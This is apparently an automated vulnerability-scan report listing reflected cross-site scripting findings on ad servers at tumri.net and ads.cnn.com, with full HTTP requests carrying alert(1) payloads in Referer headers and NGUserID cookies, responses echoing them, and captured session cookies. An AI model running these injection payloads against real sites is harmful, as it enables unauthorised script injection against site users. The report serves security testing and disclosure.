1.409. http://www.tumri.net/ads/mti/6565 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tumri.net
Path:   /ads/mti/6565

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dfd9</script><script>alert(1)</script>c0c85f40298 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ads/mti/6565?sc=y&DFA_Click_Tracker=http%3A%2F%2Fad.doubleclick.net%2Fclick%253Bh%253Dv8%2F3b34%2Ff%2Fb4%2F%252a%2Fw%253B238933302%253B7-0%253B0%253B61840000%253B4307-300%2F250%253B41496877%2F41514664%2F1%253Bu%253D17474528%253B%257Efdr%253D234368221%253B0-0%253B0%253B58255351%253B4307-300%2F250%253B41422311%2F41440098%2F1%253Bu%253D17474528%253B%257Esscs%253D%253fhttp%3A%2F%2Fbn.xp1.ru4.com%2Fbclick%3F_f%3Dc2cbda5b-233f-4d07-8070-46c870ce62cc%26_o%3D15719%26_eo%3D97956%26_et%3D1309226829%26_a%3D17087056%26_s%3D11683%26_d%3D17473217%26_c%3D17080509%26_pm%3D97956%26_pn%3D17474528%26redirect%3D&DFA_BuyId=5366545&DFA_PlacementId=61840000&DFA_AdId=238933302&DFA_CreativeId=41496877&DFA_SiteId=1073076&ct=US&st=VT&ac=802&zp=05672&bw=4&dma=25&city=17565&x2_TC_1=quote%3DPQ%26cid%3DBAC-Xplus1%26att%3D61840000;41496877%26TFN%3D8664972899%26Campaign%3D222230000010575&nf=10 HTTP/1.1
Host: www.tumri.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=1dfd9</script><script>alert(1)</script>c0c85f40298
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=618EFA7C34241D6799FE4011670CC9C0; t_rt1=H4sIAAAAAAAAAFvzloG13J3RlYGBQZABDLjfMDAwGgQ+sq1nZHfz8XT3CLFmYg53DGZmdvIPZuEyMNM3NtA3MjA0ZBUwMNcHIhC7BgiNTQDHDDklTQAAAA==; C=-327218980|1605718887

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Content-Type: text/html;charset=UTF-8
Date: Tue, 28 Jun 2011 02:15:12 GMT
Expires: Tue Jun 28 02:15:13 UTC 2011
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: C=-327218980|1605718887; Domain=.tumri.net; Expires=Wed, 27-Jun-2012 02:15:13 GMT; Path=/
Content-Length: 15546
Connection: keep-alive

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />


<script type="text/javascript">
(function() {
/**
* Der
...[SNIP]...
/Eastern","UserBucket":"80","TumriMiniTag":"true","ProductsTheme":"AllState_Myth_MR","ISN":"565389431|-1188085976","UserId":"-327218980|1605718887","PublisherURL":"http://www.google.com/search?hl=en&q=1dfd9</script><script>alert(1)</script>c0c85f40298","ServiceControlID":"|name=AllStatePilotTest|v=TC_DEFAULT_300x250_Myth_Saving_Q1|i=4629: 00-00-02-01"};
var camAttribs={"LandingPageURL":"https://quote.allstate.com/ConfiguratorFrame.aspx?creative
...[SNIP]...

1.410. http://www.tumri.net/ads/mti/6928 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tumri.net
Path:   /ads/mti/6928

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1360e</script><script>alert(1)</script>4c1b27edcf7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ads/mti/6928?ATL_Click_Tracker=http%3A%2F%2Fad.doubleclick.net%2Fclick%253Bh%253Dv8%2F3b34%2Ff%2Feb%2F%252a%2Fz%253B238891755%253B1-0%253B0%253B60250584%253B4307-300%2F250%253B41657951%2F41675738%2F1%253Bu%253D17308911%253B%257Esscs%253D%253fhttp%253A%252F%252Fbn.xp1.ru4.com%252Fbclick%253F_f%253D7ec0beaf-4cf3-449c-b17a-57792b122e66%2526_o%253D17161829%2526_eo%253D97956%2526_et%253D1309224169%2526_a%253D17210724%2526_s%253D11683%2526_d%253D17282798%2526_c%253D17161854%2526_pm%253D97956%2526_pn%253D17308911%2526redirect%253Dhttp%3A%2F%2Fclk.atdmt.com%2Fgo%2F311947907%2Fdirect%3Bai.225134941%3Bct.1%2F01%3Fhref%3D&ATL_CampaignId=direct&ATL_PlacementId=311947907&ATL_AdId=225134941&nf=10&loc=http%3A%2F%2Fview.atdmt.com%2FMGM%2Fiview%2F311947907%2Fdirect%2F01%2F539533%3Fclick%3Dhttp%3A%2F%2Fad.doubleclick.net%2Fclick%253Bh%253Dv8%2F3b34%2Ff%2Feb%2F%252a%2Fz%253B238891755%253B1-0%253B0%253B60250584%253B4307-300%2F250%253B41657951%2F41675738%2F1%253Bu%253D17308911%253B%257Esscs%253D%253fhttp%253A%252F%252Fbn.xp1.ru4.com%252Fbclick%253F_f%253D7ec0beaf-4cf3-449c-b17a-57792b122e66%2526_o%253D17161829%2526_eo%253D97956%2526_et%253D1309224169%2526_a%253D17210724%2526_s%253D11683%2526_d%253D17282798%2526_c%253D17161854%2526_pm%253D97956%2526_pn%253D17308911%2526redirect%253D HTTP/1.1
Host: www.tumri.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=1360e</script><script>alert(1)</script>4c1b27edcf7
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C=-327218980|1605718887; t_rt1=H4sIAAAAAAAAAFvzloG13J3RlYGBQZABDLjfMDAwGgQ+sq1nZHfz8XT3CLFmYg53DGZmdvIPZuEyMNM3NtA3MjA0ZBUwMNcHIhC7BgiNTQDHDDklTQAAAA==

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Content-Type: text/html;charset=UTF-8
Date: Tue, 28 Jun 2011 01:24:55 GMT
Expires: Tue Jun 28 01:24:56 UTC 2011
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: no-cache
Server: Apache-Coyote/1.1
Set-Cookie: C=-327218980|1605718887; Domain=.tumri.net; Expires=Wed, 27-Jun-2012 01:24:56 GMT; Path=/
Content-Length: 18564
Connection: keep-alive

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />


<script type="text/javascript">
(function() {
/**
* Der
...[SNIP]...
Eastern","UserBucket":"80","TumriMiniTag":"true","ProductsTheme":"300x250_MGM_All","ISN":"-1105100281|-1631807554","UserId":"-327218980|1605718887","PublisherURL":"http://www.google.com/search?hl=en&q=1360e</script><script>alert(1)</script>4c1b27edcf7","ServiceControlID":"|name=MGM_2011|v=TC_DEFAULT_300x250_Craving|i=4858: 00"};
var camAttribs={"background_image_url":"http://ytaahg.vo.llnwd.net/d1/ics-campaign//5157/c/3959/300_blu_bg_5.swf","ke
...[SNIP]...

1.411. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_brand=fortune&cnn_money_pagetype=social_sync&cnn_money_position=620x60_mid&cnn_money_rollup=technology&cnn_money_section=social_media&cnn_money_subsection=commenting¶ms.styles=fs&page.allowcompete=yes&tile=1309224167493&page.allowcompete=yes&domId=61790 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_brand=fortune&cnn_money_pagetype=social_sync&cnn_money_position=620x60_mid&cnn_money_rollup=technology&cnn_money_section=social_media&cnn_money_subsection=commenting&params.styles=fs&page.allowcompete=yes&tile=1309224167493&page.allowcompete=yes&domId=61790

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4ae0"><script>alert(1)</script>06b535efcde was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_brand=fortune&cnn_money_pagetype=social_sync&cnn_money_position=620x60_mid&cnn_money_rollup=technology&cnn_money_section=social_media&cnn_money_subsection=commenting&params.styles=fs&page.allowcompete=yes&tile=1309224167493&page.allowcompete=yes&domId=61790 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/01/04/the-secs-challenge-in-the-secondary-market/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a3d0a31-24092-1838035079-1d4ae0"><script>alert(1)</script>06b535efcde; __qca=P0-880419330-1305981351672; s_vi=[CS]v1|26EBD903051D00FC-60000128000842F6[CE]; __qseg=Q_D|Q_T|Q_2902|Q_291|Q_446|Q_232|Q_250|Q_249|Q_2900|Q_1758|Q_1663|Q_578|Q_577|Q_242|Q_241|Q_240|Q_236; __switchTo5x=68; __unam=7549672-130313f47dd-2d6d1144-1

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 01:23:16 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad6:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Tue, 28 Jun 2011 01:23:16 GMT
Pragma: no-cache
Content-Length: 3624
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
,1685,1738,3443,3445,3458,4450,6350,47457,52263,52901,56058,56872,57005,57006,57810,58702,61089,61263,61887,61908,61913,63267,116196,116271,116488,116729&RawValues=NGUSERID%2Ca3d0a31-24092-1838035079-1d4ae0"><script>alert(1)</script>06b535efcde%2CTIL%2C1309224167493&Redirect=http://www.money.com">
...[SNIP]...

1.412. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=336x280_quigo&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo¶ms.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=2902&qcseg=291&qcseg=446&qcseg=232&qcseg=250&qcseg=249&qcseg=2900&qcseg=1758&bizo_ind=business_services&bizo_func=it_systems_analysts&bizo_sen=executive&tile=1309224167493&page.allowcompete=yes&domId=528442 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=336x280_quigo&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=2902&qcseg=291&qcseg=446&qcseg=232&qcseg=250&qcseg=249&qcseg=2900&qcseg=1758&bizo_ind=business_services&bizo_func=it_systems_analysts&bizo_sen=executive&tile=1309224167493&page.allowcompete=yes&domId=528442

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d2b27"><script>alert(1)</script>631b1f2a2bd was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=336x280_quigo&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=2902&qcseg=291&qcseg=446&qcseg=232&qcseg=250&qcseg=249&qcseg=2900&qcseg=1758&bizo_ind=business_services&bizo_func=it_systems_analysts&bizo_sen=executive&tile=1309224167493&page.allowcompete=yes&domId=528442 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/01/04/the-secs-challenge-in-the-secondary-market/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a3d0a31-24092-1838035079-1d2b27"><script>alert(1)</script>631b1f2a2bd; __qca=P0-880419330-1305981351672; s_vi=[CS]v1|26EBD903051D00FC-60000128000842F6[CE]; __qseg=Q_D|Q_T|Q_2902|Q_291|Q_446|Q_232|Q_250|Q_249|Q_2900|Q_1758|Q_1663|Q_578|Q_577|Q_242|Q_241|Q_240|Q_236; __switchTo5x=68; __unam=7549672-130313f47dd-2d6d1144-1

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 01:23:16 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad6:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Tue, 28 Jun 2011 01:23:16 GMT
Pragma: no-cache
Content-Length: 2845
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
752,52901,52977,54254,56058,56872,57005,57006,58702,60072,60073,60092,60094,60443,61089,61263,61391,61399,61421,61887,61908,61913,63267,116488,116729&amp;RawValues=NGUSERID%2Ca3d0a31-24092-1838035079-1d2b27"><script>alert(1)</script>631b1f2a2bd%2CTIL%2C1309224167493&amp;random=cgdcjsd,bhaslieehivjl&amp;Params.tag.transactionid=" width="1" height="1"border="0" />
...[SNIP]...

1.413. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=628x215_bot&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo¶ms.styles=fs&page.allowcompete=yes&tile=1309224167493&page.allowcompete=yes&domId=260693 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=628x215_bot&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo&params.styles=fs&page.allowcompete=yes&tile=1309224167493&page.allowcompete=yes&domId=260693

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59a1b"><script>alert(1)</script>f8a8a7a40b1 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=628x215_bot&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo&params.styles=fs&page.allowcompete=yes&tile=1309224167493&page.allowcompete=yes&domId=260693 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/01/04/the-secs-challenge-in-the-secondary-market/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a3d0a31-24092-1838035079-159a1b"><script>alert(1)</script>f8a8a7a40b1; __qca=P0-880419330-1305981351672; s_vi=[CS]v1|26EBD903051D00FC-60000128000842F6[CE]; __qseg=Q_D|Q_T|Q_2902|Q_291|Q_446|Q_232|Q_250|Q_249|Q_2900|Q_1758|Q_1663|Q_578|Q_577|Q_242|Q_241|Q_240|Q_236; __switchTo5x=68; __unam=7549672-130313f47dd-2d6d1144-1

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 01:23:16 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad6:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Tue, 28 Jun 2011 01:23:16 GMT
Pragma: no-cache
Content-Length: 2783
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
74,1685,1738,3458,4450,6350,47457,48989,52263,52752,52754,52901,54254,56058,56872,57005,57006,58702,61089,61263,61887,61908,61913,63267,116488,116729&amp;RawValues=NGUSERID%2Ca3d0a31-24092-1838035079-159a1b"><script>alert(1)</script>f8a8a7a40b1%2CTIL%2C1309224167493&amp;random=chAsyKs,bhaslieehivjm&amp;Params.tag.transactionid=" width="1" height="1"border="0" />
...[SNIP]...

1.414. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_bot¶ms.styles=fs&tile=1309224167493&page.allowcompete=yes&domId=229469 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=1x1_bot&params.styles=fs&tile=1309224167493&page.allowcompete=yes&domId=229469

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b0f89"><script>alert(1)</script>0b378bdac0f was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=1x1_bot&params.styles=fs&tile=1309224167493&page.allowcompete=yes&domId=229469 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/01/04/the-secs-challenge-in-the-secondary-market/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a3d0a31-24092-1838035079-1b0f89"><script>alert(1)</script>0b378bdac0f; __qca=P0-880419330-1305981351672; s_vi=[CS]v1|26EBD903051D00FC-60000128000842F6[CE]; __qseg=Q_D|Q_T|Q_2902|Q_291|Q_446|Q_232|Q_250|Q_249|Q_2900|Q_1758|Q_1663|Q_578|Q_577|Q_242|Q_241|Q_240|Q_236; __switchTo5x=68; __unam=7549672-130313f47dd-2d6d1144-1; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 01:23:51 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad6:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Tue, 28 Jun 2011 01:23:51 GMT
Pragma: no-cache
Content-Length: 998
Content-Type: text/html

<a target="_blank" href="/event.ng/Type=click&FlightID=4621&AdID=220606&TargetID=1515&Segments=2244,2743,3285,6298,6520,8598,17251,18961,19419,25128,25342,25344,25412,32749,32922,33852,34172,35306,363
...[SNIP]...
6,917,989,1285,1589,1609,1674,1685,1738,4450,6350,47457,52263,52901,56058,56872,57005,57006,58683,58702,61089,61263,61887,61908,61913,63267,116488,116729&RawValues=NGUSERID%2Ca3d0a31-24092-1838035079-1b0f89"><script>alert(1)</script>0b378bdac0f%2CTIL%2C1309224167493&Redirect=http%3A%2F%2Fwww.cnn.com">
...[SNIP]...

1.415. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=business_news¶ms.styles=fs&tile=1309224167493&page.allowcompete=yes&domId=84066 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=business_news&params.styles=fs&tile=1309224167493&page.allowcompete=yes&domId=84066

Issue detail

The value of the NGUserID cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e98f'-alert(1)-'0c6af9d654e was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=business_news&params.styles=fs&tile=1309224167493&page.allowcompete=yes&domId=84066 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/01/04/the-secs-challenge-in-the-secondary-market/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a3d0a31-24092-1838035079-17e98f'-alert(1)-'0c6af9d654e; __qca=P0-880419330-1305981351672; s_vi=[CS]v1|26EBD903051D00FC-60000128000842F6[CE]; __qseg=Q_D|Q_T|Q_2902|Q_291|Q_446|Q_232|Q_250|Q_249|Q_2900|Q_1758|Q_1663|Q_578|Q_577|Q_242|Q_241|Q_240|Q_236; __switchTo5x=68; __unam=7549672-130313f47dd-2d6d1144-1; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 01:23:21 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad6:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Tue, 28 Jun 2011 01:23:21 GMT
Pragma: no-cache
Content-Length: 3012
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
,1285,1589,1609,1674,1685,1738,3448,4450,6350,47457,52263,52901,56058,56872,57005,57006,58702,58848,61089,61263,61887,61908,61913,63267,116488,116729&amp;RawValues=NGUSERID%2Ca3d0a31-24092-1838035079-17e98f'-alert(1)-'0c6af9d654e%2CTIL%2C1309224167493&amp;random=xcrlwy,bhaslijehivNc&amp;Params.tag.transactionid=" width="1" height="1"border="0" />
...[SNIP]...

1.416. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=314x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular¶ms.styles=fs&page.allowcompete=yes&tile=1309224167493&page.allowcompete=yes&domId=383053 [NGUserID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.cnn.com
Path:   /html.ng/site=cnn_money&cnn_money_position=314x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular&params.styles=fs&page.allowcompete=yes&tile=1309224167493&page.allowcompete=yes&domId=383053

Issue detail

The value of the NGUserID cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51627"><script>alert(1)</script>f33096e1f41 was submitted in the NGUserID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /html.ng/site=cnn_money&cnn_money_position=314x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular&params.styles=fs&page.allowcompete=yes&tile=1309224167493&page.allowcompete=yes&domId=383053 HTTP/1.1
Host: ads.cnn.com
Proxy-Connection: keep-alive
Referer: http://tech.fortune.cnn.com/2011/01/04/the-secs-challenge-in-the-secondary-market/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NGUserID=a3d0a31-24092-1838035079-151627"><script>alert(1)</script>f33096e1f41; __qca=P0-880419330-1305981351672; s_vi=[CS]v1|26EBD903051D00FC-60000128000842F6[CE]; __qseg=Q_D|Q_T|Q_2902|Q_291|Q_446|Q_232|Q_250|Q_249|Q_2900|Q_1758|Q_1663|Q_578|Q_577|Q_242|Q_241|Q_240|Q_236; __switchTo5x=68; __unam=7549672-130313f47dd-2d6d1144-1

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 01:23:16 GMT
Server: Apache
Vary: Cookie
AdServer: ad3ad6:9678:1
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Cache-Control: max-age=0, no-cache, private
Expires: Tue, 28 Jun 2011 01:23:16 GMT
Pragma: no-cache
Content-Length: 3630
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>

<script>
function cnnad_getTld (hostname)
{
var data = hostname.split(".");

...[SNIP]...
,1609,1674,1685,1738,3448,4450,6350,47457,52263,52901,56058,56872,57005,57006,57810,58702,61089,61263,61887,61908,61913,63267,116201,116267,116488,116729&RawValues=NGUSERID%2Ca3d0a31-24092-1838035079-151627"><script>alert(1)</script>f33096e1f41%2CTIL%2C1309224167493&Redirect=http://www.money.com">
...[SNIP]...

1.417. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
